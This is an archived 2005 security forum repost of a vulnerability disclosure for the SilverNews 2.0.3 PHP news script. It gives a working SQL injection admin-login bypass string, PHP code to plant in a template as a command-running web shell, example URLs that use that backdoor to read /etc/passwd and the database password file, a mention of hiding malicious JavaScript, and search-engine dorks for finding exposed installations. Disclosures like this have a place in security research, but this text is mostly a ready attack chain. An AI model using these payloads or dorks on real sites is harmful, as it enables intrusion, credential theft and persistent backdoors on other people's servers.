EvilOctal Security Team Technical Discussion Group's Archiver

冰血封情 2005-8-7 23:44

[Repost] SilverNews 2.0.3 (the preview version may also be affected) SQL Injection vulnerability and testing method

Article author: retrogod [at] aliceposta.it

software:
author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews

SQL Injection / Login bypass:

A user can bypass the admin password check if magic_quotes is set to off:

user: ' or isnull(1/0) /*
pass: whatever


remote commands execution:

now, the new admin can edit the template: clicking on Templates -> Global footer, they can
add the lines:

//***********************************************
</body>
</html>

TEMPLATE;
}
}
system($HTTP_GET_VARS[command]);

/*

to leave a backdoor in the template file /templates/tpl_global.php
now system commands can be launched on the target system with these URLs:

http://[target]/[path]//templates/tpl_global.php?command=ls%20-la

to list directories

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd

to see /etc/passwd file

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php

to see the MySQL database password (look inside the html...)


cross site scripting:

in the same way, a user can hide evil javascript code in the template


googledork: "Powered by SilverNews"
or: intitle:"SilverNews 2.0 Admin control panel"

© 1999-2008 EvilOctal Security Team